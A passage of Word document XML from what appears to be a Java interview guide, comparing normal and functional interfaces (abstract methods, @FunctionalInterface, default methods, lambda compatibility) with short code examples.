      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F11858" w14:textId="22A6A948" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004464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2E05195">
          <v:rect id="_x0000_i1680" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3170B191" w14:textId="13BE6305" w:rsidR="001B09AC" w:rsidRPr="00CE4B95" w:rsidRDefault="001B09AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="216" w:name="_Toc196307696"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between normal interface and Functional Interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
    </w:p>
    <w:p w14:paraId="5723443A" w14:textId="05EA6789" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">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key differences between a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>normal interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD56F5" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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Abstract Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FDF8CD" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rmal Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A normal interface can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>any number of abstract methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (including none). It does not have any restrictions on the number of abstract methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453EBDCB" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unctional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A functional interface has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This is the key feature that distinguishes a functional interface from a normal interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1303EF1D" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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18F8E143" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96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rmal Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE683E2"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NormalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E45F4"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method1();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AE54BF"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void method2();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F5D238"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28E75FA" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96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unctional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E50C42B"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B82A957"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FunctionalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA77B65"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method();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A35B738"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9C2BDE7" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFC299A" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rmal Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is used to define a contract for classes that implement it, providing multiple methods that the implementing class must override.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD4B4E3" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unctional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It is specifically designed to be used with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</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method references</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. A functional interface can be treated as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-class function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C4E4A" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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Annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C46752" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rmal Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A normal interface does not need to have any special annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BC60A0" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unctional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A functional interface is typically annotated with @FunctionalInterface, which is not mandatory but serves as a way to indicate that the interface is intended to be used with lambda expressions. The annotation also helps the compiler enforce the rule that there is only one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D39792" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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656A6D6A"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF4703F"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FunctionalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4282FA93"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singleMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3C380"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7FFE722" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F52D0D4" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rmal Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>any number of abstract methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can also have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default</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static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods (since Java 8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372227D0" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unctional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but can also have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple default or static methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The abstract method is what the lambda expression will implement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E2563" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD241A" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rmal Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Normal interfaces are used to define a collection of related methods that implementing classes must provide concrete implementations for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEECAD1" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unctional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Functional interfaces are used to define single-method interfaces, which can be implemented using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, method references, or anonymous classes. These interfaces are often used as arguments for methods that accept behavior (like Comparator, Runnable, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E797CE" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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Inheritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B7988B" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rmal Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A normal interface can extend multiple interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E63FD1C" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unctional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A functional interface can extend multiple interfaces </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only if</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the parent interfaces contain only one abstract method each, otherwise it violates the functional interface rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF21B99" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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4F19A34F" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96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rmal Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259AE8AA"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC88DD"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makeSound();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217B6E96"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sleep();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E4457"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0A07AE6" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96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unctional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1797935D"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFD070A"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Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0203E394"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run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3E492E"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28A4E30" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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7. Lambda Expression Compatibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE68E89" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96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rmal Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: You cannot use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</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method references</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a normal interface unless it has exactly one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF6E46E" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96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unctional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</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method references</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to implement the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a functional interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A60E73" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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Using Lambda):</w:t>
      </w:r>
    </w:p>
